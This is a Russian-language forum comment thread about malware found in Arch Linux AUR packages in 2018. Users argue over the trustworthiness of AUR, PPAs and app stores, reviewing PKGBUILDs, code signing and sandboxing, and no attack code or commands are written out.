в нормальных репо это ключ команды или компании, владельца дистрибутива - и предполагается, что они хоть немного проверяют, что именно им подписывают (блаженн кто верует).

А тут фейс-контроля нет.

Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

88. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от axredneck (?), 11-Июл-18, 20:19 
В смысле, Хромиум? А то к Хрому сишные патчи не применишь.
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

18. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Gentoo Developer (?), 11-Июл-18, 11:24 
Только Gentoo!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

73. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +5 +/
Сообщение от Васёк (?), 11-Июл-18, 17:54 
Иногда нужно работать а не компилировать
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

89. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –1 +/
Сообщение от axredneck (?), 11-Июл-18, 20:25 
Можно make -j1 в фоне в /tmp. Если в /tmp места нет, то BFQ. Но опять же приходится доверять тому, что в оверлеях.
Ответить | Правка | ^ к родителю #73 | Наверх | Cообщить модератору

138. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –1 +/
Сообщение от FSA (??), 15-Июл-18, 13:22 
Вот реально в фоне бывает крутится сборка какого-то крупного обновления. Из неудобств, повышенный нагрев ноутбука небольшой и немного подёргивается Youtube иногда. При этом IDE работает нормально, gulp работает нормально, веб-сервер с PHP и MySQL работает приемлемо. Можно даже под Android проект собирать. А вот когда Windows начинает что-то ставить, хоть вешайся. Такое чувство, что она обновления из исходников собирает. При этом проблемы бывают даже с перемещением курсора. А самое главное, можно запускать сборку обновлений в тот момент, когда тебе особо компьютер не нужен, а вот Windows может это сделать тогда, когда вздумает нужным или вообще поставит перед фактом, мол давай-ка перезагрузимся, после чего пол часа висит на установке обновлений и вообще ничего делать не даёт. Особенно радует, когда играешь в танки и тут срочно что-то надо сделать. Закрываешь танки и пытаешься загрузить Linux. Но нет, Windows нужно установить обновления. Я однажды не выдержал и перезагрузился жёстко. Поработал, а обратно в Windows попасть уже не смог, пришлось переустанавливать.
Ответить | Правка | ^ к родителю #73 | Наверх | Cообщить модератору

19. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +17 +/
Сообщение от Чебур (?), 11-Июл-18, 11:30 
На свалке нашли мусор, вот так новость.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

21. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +8 +/
Сообщение от iPony (?), 11-Июл-18, 11:38 
Новость наверно в том, что раньше не находили.
Это немного удивительно.
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

29. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от рачевод (?), 11-Июл-18, 12:25 
> Новость наверно в том, что раньше не находили.
> Это немного удивительно.

удивительно, что никто не хотел рыться в свалке, чтобы убедиться ? ;-)
Ну вот, нашлись какие-то бомжи, может рассчитывали озолотиться на сдаче во вторсырье.

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

49. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Андрей (??), 11-Июл-18, 14:53 
Так, может, там такого добра ещё много. Но только один чел взял и намеренно создал файлик ваш.archlinux.скомпрометирован.txt, так что не заметить было просто нельзя.
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

42. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от anonimm (?), 11-Июл-18, 14:08 
Эта новость, наверное, больше удивила тех, кто с миром Arch не знаком (в частности, меня): оказывается, у них там принято копаться по помойкам!
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

34. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от Аноним (34), 11-Июл-18, 12:39 
Почалось! Я давно уже ждал когда начнется распространение заразы со всяких ppa помоек, по которым любят шарится фанаты пакетных дистров. Давно пора.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

50. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Андрей (??), 11-Июл-18, 14:55 
А типа в ядро или другой проект не может попасть вредоносный код. Мэйнтейнеры только код от новичков отфутболивают. Так что достаточно попасть на ПК не новичка или его учётку, чтобы увеличить шансы прохождения.
Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

115. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +2 +/
Сообщение от Аноним (115), 12-Июл-18, 08:40 
Достаточно не новичку захотеть реальных денег за свои труды. Что такое доверие, если ты не знаешь всех этих людей и ответственности у них нет кроме позора в маргинальной среде и удаления учетки?
Пока выходят программы, которых нет ни в дистрах, ни в официальных репах разработчика весь этот бред и будет твоирться. Софт можно найти только в ненадежных источниках. Какая туту безопасность?
Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

94. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (94), 11-Июл-18, 20:46 
https://www.opennet.dev/opennews/art.shtml?num=24610 - я просто оставлю это здесь.
Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

38. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –1 +/
Сообщение от commiethebeastie (ok), 11-Июл-18, 13:45 
Так AUR помойка, зато в ней есть практически всё.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

40. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +2 +/
Сообщение от Аноним (-), 11-Июл-18, 14:06 
Мое любимое место, столько хaлявной тухлятинки, мммм... обожаю. ;)
Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

41. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от commiethebeastie (ok), 11-Июл-18, 14:07 
Тухлятинка обычно не собирается.
Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

134. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Джон Ленин (?), 14-Июл-18, 01:33 
Если ты хочешь из аура mesa-git собрать, то сначала надо подключить неофициальную репу llvm-svn

Там такая логика, что без одного ты не соберёшь другое, а собирать всё из сорцов — жизни не хватит чтоб разобраться с еггогами.

Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

46. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Совсем другой Аноним (?), 11-Июл-18, 14:18 
Забавные они там все.
Вот просто так валяется хлам и каждый может ещё сверху нагадить.
Не у всех видимо есть ресурсы на создание чего-то по типу Suse build service.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

47. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от нах (?), 11-Июл-18, 14:25 
так вроде сузя его уже тоже - тогось, остался урезанный и с фейс-контролем на входе (что с одной стороны - как-то и уменьшает количество троянов, а с другой - сводит и количество полезных пакетов к околонулю)
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

52. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от sergey (??), 11-Июл-18, 15:17 
Вроде, нет. Любой желающий может собирать пакеты, как и раньше.
Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

51. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –1 +/
Сообщение от J.L. (?), 11-Июл-18, 14:55 
аааааяяя говорииииииил!!!!

линукс надо защищать по дефолту и юзера от программ и программы от программ
в винде в силу контингента иди^W пользователей оной с этим сейчас лучше чем в линуксе

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

58. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (58), 11-Июл-18, 16:03 
В виндоувсе со многими аспектами лучше, чем в линуксе.
Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору

63. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Клыкастый (ok), 11-Июл-18, 16:41 
с троянами и майнингом например
Ответить | Правка | ^ к родителю #58 | Наверх | Cообщить модератору

69. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от нах (?), 11-Июл-18, 17:34 
в windows store - пока не замечено ни того, ни другого.

В том числе да, и потому, что надо заплатить денег за сертификат. Пусть копеечных.

Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

74. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +3 +/
Сообщение от Клыкастый (ok), 11-Июл-18, 17:55 
> в windows store - пока не замечено ни того, ни другого.

так там и софта не замечено

Ответить | Правка | ^ к родителю #69 | Наверх | Cообщить модератору

78. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от пох (?), 11-Июл-18, 19:37 
патамуштанадазаплатитьзасертификат, ага. Ну то есть - помоечного софта незамечено, а непомоечного - так его и в гуглоплее днем с фонарем (и не вздумайте тот фонарь что первым нашелся поиском, и вторым, и третьим, где-то с пятнадцатого начинаются работающие, без требований доступа к sms и телефонной книжке)

а казалось бы - бери и эксплойть миллионы виндохомячков (думаю, их все еще даже больше, чем владельцев андроедов, молчу уж про какой-то там рач и его полтора юзера, да еще и тянущих что попало с aur). Но нет, копеечная преграда - и никого на горизонте.

P.S. месяц назад был изумлен, обнаружив там UBO. В общих чертах - вполне работающий. Казалось бы, где имение, а где вода?

Ответить | Правка | ^ к родителю #74 | Наверх | Cообщить модератору

81. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от username (??), 11-Июл-18, 19:47 
В маке как то решают, все живы. Там сертификат подписи с оперативным отзывом со стороны apple и ревью приложения перед публикацией.
Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору

84. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от soarin (ok), 11-Июл-18, 19:59 
> В маке как то решают, все живы

Не все. Многие от туда просто свалили. И распространяют свой софт не через AppStore, а по принципу "скачать dmg с нашего сайта"


Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

96. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от username (??), 11-Июл-18, 21:03 
Свалили таки по другой причине. Любой софт из стора работает в песочнице(по моему в windows теперь так же), не всех разработчиков это устраивает по разным причинам.
На моей памяти совсем без сертификата был только transmission. ПО в пакетах pkg отдельная песня, не всем оно нужно и обычно есть альтернативные пути.
Ответить | Правка | ^ к родителю #84 | Наверх | Cообщить модератору

116. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от . (?), 12-Июл-18, 09:31 
> В маке как то решают, все живы.

идея та же что у MS, но уже не годится первый попавшийся code signing сертификат за любые три копейки - нужен специальный, одобренный эплом, пачку себе понавыписать и менять раз в день не получится. После этого изволь свой проект на блюдечке представить к рассмотрению - что тоже само-то по себе не панацея, но еще одна преграда, требующая времени и деньжат. А мы ж хотим побыстрому нагадить/стырить что-нибудь и смыться, нам некогда - поэтому мы пойдем туда, где не надо ни денег платить, ни фейсконтроль проходить.

Ну, соответственно, софта тоже сильно поменьше чем для ведроида, и особенно - софта помоешного. Сильно побольше чем у винды, но это в основном потому, что поляну успели застолбить гораздо раньше. Худо-бедно какая-то кормовая база для его писателей успела нарости.


Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

83. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –1 +/
Сообщение от soarin (ok), 11-Июл-18, 19:57 
> Ну то есть - помоечного софта незамечено

Плохо смотрел. Этак в годах 2013-2014 я как-то туда лазил. Там жуть была.
Потом правда занялись, и исправили это безобразие.

https://www.instagram.com/p/svMZwyI66q/

Без нормальной модерации другого не дано.

Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору

98. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +2 +/
Сообщение от Аноним84701 (ok), 11-Июл-18, 21:19 
> В виндоувсе со многими аспектами лучше, чем в линуксе.

В смысле -- вместо долгих «нескольких часов», всего за какой-то жалкий месяц обнаружили, что кто-то хакнул  CCleaner, не поленившись до кучи еще и стырить ключ для подписи setup.exe и успел заразить пару миллионов пользователей?
https://thehackernews.com/2017/09/ccleaner-hacked-malware.html


Ответить | Правка | ^ к родителю #58 | Наверх | Cообщить модератору

128. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от нах (?), 12-Июл-18, 17:27 
вот и не ставь всякой фигни с васян-сайтов, и под виндой тоже не.
Хакнули-то cdn avast, а не microsoft store.

Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

61. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –1 +/
Сообщение от Аноним (62), 11-Июл-18, 16:36 
Внезапно, в AUR'е и гентушных оверлеях можно хоть скрипт сборочный почитать, что он делает. В отличие от PPA и всяких васянских помоек с уже собранными бинарниками, которыми так любят обмазыватся убунтуи и редхатоиды.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

67. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от нах (?), 11-Июл-18, 17:33 
ты не поверишь, в большинстве этих помоек есть source repo. Но из него никто никогда не ставит, как и рачеводы никогда не читают свои сборочные скрипты, а гентушники все ждут и ждут ебилдов, не умея написать свой.

Пока кто-то добрый не создаст им прямо в хомяке файл с именем PWNED!!! , тогда, может быть, замечают что что-то не так.

разумеется, есть редкие исключения, но они тоже есть везде.

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

90. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –1 +/
Сообщение от axredneck (?), 11-Июл-18, 20:30 
> рачеводы никогда не читают свои сборочные скрипты

Я читаю

Ответить | Правка | ^ к родителю #67 | Наверх | Cообщить модератору

114. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (62), 12-Июл-18, 08:34 
>ты не поверишь, в большинстве этих помоек есть source repo.

В больших, типа epel'я есть, а в мелких, на пять-десять пакетов пару раз только видел, и то оне были копроративные, а васяны подобными тонкими материями не заморачиваются.

>рачеводы никогда не читают свои сборочные скрипты, а гентушники все ждут и ждут ебилдов, не умея написать свой.

Я и ебилд могу написать, и deb/rpm пакет собрать, но зачем, если кто-то уже сделал? Тот, кто этим пакетом давно занимается, по-любому лучше меня знает всякие нюансы, из-за которых пакет может не собраться или собраться с косяками. А еще его поддерживать надо, апдейтить и с другими пакетами стыковать.

Ответить | Правка | ^ к родителю #67 | Наверх | Cообщить модератору

117. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –2 +/
Сообщение от Daemon (??), 12-Июл-18, 09:31 
а при чем тут source repo? пакет (как минимум deb, за rpm не ручаюсь) - это архив, который можно распаковать, а в нем и находятся скрипты, которые выполняются во время установки или удаления пакета (preinst, postinst, prerm, postrm) их можно посмотреть перед установкой.
в добавок apt перед установкой какого-нибудь пакета сразу говорит что собирается ставить и ожидает подтверждения. Список этот можно сохранить, вместо install выполнить download (чтобы загрузить пакеты без установки), и дальше архиватором пройтись по загруженным архивам на поиск трояна.
Да, долго, да неудобно, но возможно же.
Ответить | Правка | ^ к родителю #67 | Наверх | Cообщить модератору

131. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (131), 13-Июл-18, 13:32 
На сколько пакетов тебя хватит?
Ответить | Правка | ^ к родителю #117 | Наверх | Cообщить модератору

68. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от anonymous (??), 11-Июл-18, 17:34 
Ну почитал и что. То же что и на бинарник поглядеть. Читатели блин.
Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

85. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от lucentcode (ok), 11-Июл-18, 20:06 
Эка невидаль. А PKGBUILD на что yaourt каждый раз заботливо предлагает читать? Большинство из них очень простенькие. Есть пакеты с патчсетами, где диффы прямо с пакетом идут, но их мало и патчи как правило тоже маленькие. Для важных мне пакетов я не ленюсь каждый раз просматривать PKGBUILD, ну и изучать остальные задействованные при сборке файлы, если они вызывают пусть и слабые, но подозрения. Зная как работает AUR, нужно просто им правильно пользоваться. А от бяки никто не застрахован. Вот недавно в snap-пакетах майнеры находили. Не удивлюсь, если и в пакетах какого-то не очень популярного дистра(или хотя-бы в ppa популярного) найдут подобные "подарки". А пацику, что отвайтхейтил неосторожных пользователей AUR спасибо сказать нужно - он ничем деструктивным не побаловался на их тачках, и при этом преподал им ценный урок. Будут читать PKGBUILD-ы теперь.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

95. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от axredneck (?), 11-Июл-18, 20:51 
> А PKGBUILD на что yaourt каждый раз заботливо предлагает читать

Есть, правда, еще pacaur, который, если не ошибаюсь, молча качает и ставит.

Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

123. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от J.L. (?), 12-Июл-18, 12:57 
> Для важных мне пакетов я не ленюсь каждый раз просматривать PKGBUILD

а не важные для вас пакеты значит хомяк не овнят?
с остальным согласен

просто не метод всё глазами и руками делать, так можно дойти до самостоятельного написания нужных лично программ
тут скорее нужны наработки "защищённых андройдов" с песочницами, подстановкой виртуальных данных вместо реальных и тд

Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

142. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от lucentcode (ok), 29-Июл-18, 23:49 
> просто не метод всё глазами и руками делать, так можно дойти до
> самостоятельного написания нужных лично программ
> тут скорее нужны наработки "защищённых андройдов" с песочницами, подстановкой виртуальных
> данных вместо реальных и тд

Согласен, только пока ничего подобного не видел. И не факт что кто-то вообще возьмётся подобное пилить. Больше надежды что кто-то допилит песочницу для flatpack, и отсутствующее в репах ПО будут ставить из хаба с пакетами flatpack.

Ответить | Правка | ^ к родителю #123 | Наверх | Cообщить модератору

99. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +2 +/
Сообщение от Sluggard (ok), 11-Июл-18, 21:22 
Как-то не удивляет и не пугает такое. AUR в Арче, юзерские PPA в Убунту, репы home:user в Сусе — это всегда неизвестно что и на свой страх и риск.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

101. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от ы (?), 11-Июл-18, 21:29 
большинство пипла, судя по комментам, не в курсе с чем едят aur, а с чем нет, но, чсх, мнение имеют.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

110. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (110), 12-Июл-18, 01:48 
> В данные пакеты был добавлен код для загрузки и запуска скрипта...

Типичный линуксоидно-школотронский стиль - засунем в билды всяких примочек, скриптов, картинок! Пусть дыры зияют, главное - можно запускать свои идиотские скрипты. Хотя казалось бы, это СБОРКА - пиши программу так, чтобы в ней не приходилось ничего "шаманить" со средой, файлами и т.п. Просто скомпили *.c - чего тебе ещё надо??

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

113. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (62), 12-Июл-18, 08:27 
Внизaпна, унутре твоих любимых .exe тоже есть скрипты, но тебе их не покажут, чтоб не травмировать нежную хипсторскую психику.
Ответить | Правка | ^ к родителю #110 | Наверх | Cообщить модератору

141. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от arisu (ok), 16-Июл-18, 20:03 
вот тебе, например, рабочих мозгов надо.
Ответить | Правка | ^ к родителю #110 | Наверх | Cообщить модератору

119. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –1 +/
Сообщение от Аноним (119), 12-Июл-18, 10:59 
Та норм тема аур.  Все кто его хейтят просто завидуют, что в их дистре нет подобной штуки. Понятно дело во всем есть свои минусы и плюсы, но плюсы аура перевешивают минусы. От установки говна никакая ос не застрахована.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

121. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (23), 12-Июл-18, 12:30 
> Все кто его хейтят просто завидуют,

Перевод с арчеводного на русский:
"хейтить" - не любить, не восторгаться, непочтительно и неуважительно отзываться о проекте
Т.е. на самом деле все, кто не пользуется аркой - люто завидуют!

Ответить | Правка | ^ к родителю #119 | Наверх | Cообщить модератору

136. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (136), 14-Июл-18, 20:52 
Все завидуют,ага.
Особенно bsdишники и гентушники ХD
Ответить | Правка | ^ к родителю #119 | Наверх | Cообщить модератору

124. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от Аноним (124), 12-Июл-18, 14:13 
> В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com

Проделки космонафта. Хочет сравнить с результаты с бубунтой.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

125. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от нах (?), 12-Июл-18, 16:46 
плюсадын (выпиливает apport - еще один троянец, помимо "contest"а)
Ответить | Правка | ^ к родителю #124 | Наверх | Cообщить модератору

135. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (136), 14-Июл-18, 20:50 
>В AUR-репозитории Arch Linux найдено вредоносное ПО

А сколько ещё не выявлено.)
Зато модно стильно и молодёжно.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру